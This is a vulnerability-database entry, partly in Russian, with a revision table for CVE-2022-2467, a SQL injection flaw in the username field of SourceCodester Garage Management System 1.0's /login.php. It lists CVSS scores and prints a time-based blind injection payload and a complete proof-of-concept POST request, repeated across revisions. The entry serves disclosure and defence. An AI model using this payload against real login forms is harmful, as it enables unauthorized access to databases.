SourceCodester Garage Management System 1.0 /login.php username sql-инъекция

ВходИсторияДиффjsonxmlCTI

Уязвимость была найдена в SourceCodester Garage Management System 1.0. Она была объявлена как критический. Затронута неизвестная функция файла /login.php. Использование CWE для объявления проблемы приводит к тому, что CWE-89. Консультация доступна для скачивания по адресу github.com. Эта уязвимость была названа CVE-2022-2467. Атаку можно осуществить удаленно. Имеются технические подробности. Более того, существует эксплойт. Эксплойт был раскрыт общественности и может быть использован. Текущая цена за эксплойт может составлять около USD $0-$5k в настоящее время. Проект MITRE ATT&CK объявляет технику атаки как T1505. Объявляется proof-of-concept. Эксплойт можно загрузить по адресу github.com. В 0-дневный период предполагаемая подземная цена составляла около $0-$5k.

Поле	06.08.2022 12:30	06.08.2022 12:39	06.08.2022 12:45
vendor	SourceCodester	SourceCodester	SourceCodester
name	Garage Management System	Garage Management System	Garage Management System
version	1.0	1.0	1.0
file	/login.php	/login.php	/login.php
argument	username	username	username
cwe	89 (sql-инъекция)	89 (sql-инъекция)	89 (sql-инъекция)
risk	2	2	2
cvss3_vuldb_av	N	N	N
cvss3_vuldb_ac	L	L	L
cvss3_vuldb_pr	N	N	N
cvss3_vuldb_ui	N	N	N
cvss3_vuldb_s	U	U	U
cvss3_vuldb_c	L	L	L
cvss3_vuldb_i	L	L	L
cvss3_vuldb_a	L	L	L
cvss3_vuldb_e	P	P	P
cvss3_vuldb_rc	R	R	R
url	https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md	https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md	https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md
availability	1	1	1
publicity	1	1	1
url	https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md	https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md	https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md
cve	CVE-2022-2467	CVE-2022-2467	CVE-2022-2467
responsible	VulDB	VulDB	VulDB
date	1658181600 (19.07.2022)	1658181600 (19.07.2022)	1658181600 (19.07.2022)
cvss2_vuldb_av	N	N	N
cvss2_vuldb_ac	L	L	L
cvss2_vuldb_au	N	N	N
cvss2_vuldb_ci	P	P	P
cvss2_vuldb_ii	P	P	P
cvss2_vuldb_ai	P	P	P
cvss2_vuldb_e	POC	POC	POC
cvss2_vuldb_rc	UR	UR	UR
cvss2_vuldb_rl	ND	ND	ND
cvss3_vuldb_rl	X	X	X
cvss2_vuldb_basescore	7.5	7.5	7.5
cvss2_vuldb_tempscore	6.4	6.4	6.4
cvss3_vuldb_basescore	7.3	7.3	7.3
cvss3_vuldb_tempscore	6.6	6.6	6.6
cvss3_meta_basescore	7.3	8.1	8.1
cvss3_meta_tempscore	6.6	7.9	7.9
price_0day	$0-$5k	$0-$5k	$0-$5k
input_value	1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT	1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT	1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT
sourcecode	POST /login.php HTTP/1.1 Host: [TARGET URL/IP] Content-Length: 41 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://shen-ji.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://shen-ji.com/login.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=coj91b4jkkol1s8oalg3r7in12 Connection: close username=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=	POST /login.php HTTP/1.1 Host: [TARGET URL/IP] Content-Length: 41 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://shen-ji.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://shen-ji.com/login.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=coj91b4jkkol1s8oalg3r7in12 Connection: close username=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=	POST /login.php HTTP/1.1 Host: [TARGET URL/IP] Content-Length: 41 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://shen-ji.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://shen-ji.com/login.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=coj91b4jkkol1s8oalg3r7in12 Connection: close username=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=
cve_assigned	1658181600 (19.07.2022)	1658181600 (19.07.2022)	1658181600 (19.07.2022)
cve_nvd_summary	A vulnerability has been found in SourceCodester Garage Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /login.php. The manipulation of the argument username with the input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.	A vulnerability has been found in SourceCodester Garage Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /login.php. The manipulation of the argument username with the input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.	A vulnerability has been found in SourceCodester Garage Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /login.php. The manipulation of the argument username with the input [email protected]' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
cvss3_nvd_basescore		9.8	9.8
cvss3_cna_basescore		7.3	7.3
cvss3_nvd_av		N	N
cvss3_nvd_ac		L	L
cvss3_nvd_pr		N	N
cvss3_nvd_ui		N	N
cvss3_nvd_s		U	U
cvss3_nvd_c		H	H
cvss3_nvd_i		H	H
cvss3_nvd_a		H	H
cvss3_cna_av		N	N
cvss3_cna_ac		L	L
cvss3_cna_pr		N	N
cvss3_cna_ui		N	N
cvss3_cna_s		U	U
cvss3_cna_c		L	L
cvss3_cna_i		L	L
cvss3_cna_a		L	L
cve_cna		VulDB	VulDB

◂ Предыдущий Обзор Далее ▸

Do you need the next level of professionalism?

Upgrade your account now!